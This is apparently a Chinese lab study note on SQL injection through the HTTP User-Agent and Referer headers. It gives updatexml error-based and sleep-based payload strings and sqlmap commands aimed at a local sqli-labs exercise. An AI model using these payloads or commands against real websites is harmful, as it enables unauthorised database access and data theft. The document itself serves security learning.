HTTP 头中的 SQL 注入

Web安全攻防 学习笔记

一、HTTP 头中的 SQL 注入


1.1、HTTP 头中的注入介绍

        在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生。例如 SQL 注入中,用户提交 的参数都会被代码中的某些措施进行过滤。

        过滤掉用户直接提交的参数,但是对于 HTTP 头中提交的内容很有可能就没有进行过滤。


1.2、updatexml 函数

语法:UPDATEXML (XML_document, XPath_string, new_value);

  • 第一个参数:XML_document 是 String 格式,为 XML 文档对象的名称,文中为 Doc

  • 第二个参数:XPath_string( Xpath 格式的字符串)

  • 第三个参数:new_value,String 格式,替换查找到的符合条件的数据


1.3、HTTP User-Agent 注入

另一种闭合方式:' or '1' = '1

  • 一般我们会用 ' or 1=1 --+ 是得后续代码无效化,从而起到闭合作用

  • 但若网址做了 --+ 过滤,那么这种方式也就失效了

	' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1

	# concat 是将多个字符串组合成一个
	# 0x7e 表示 ~

	' and updatexml(1,concat(1,(select database())),1) or '1' = '1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


1.4、HTTP Referer 注入

	' or if(1=1,sleep(5),null)  or '1'='1

  1. 先加个 \ 看看是否存在注入点
    在这里插入图片描述
    在这里插入图片描述

  2. 存在,则进行注入
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述


1.5、sqlmap 安全测试

  1. sqlmap 自动搜索 POST 表单注入
	$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-19/" --forms --banner --batch

	# 探测不出来

  1. sqlmap 指定参数探测 SQL 注入
	$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-19/" --data="uname=admin&passwd=admin" --banner --batch
	
	# 还是没有, 说明 uname 与 passwd 可能不存在注入点
	# 再提高 level 试试(探测内容更多)

	$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-19/" --data="uname=admin&passwd=admin" --banner --batch -level 3

  1. sqlmap referer 注入把 referer 改成 * 或者在后面加上 *(其他参数也行,如 User-Agent 注入再 User-Agent 后面加一个 *
	$ python sqlmap.py -r target.txt --banner

在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值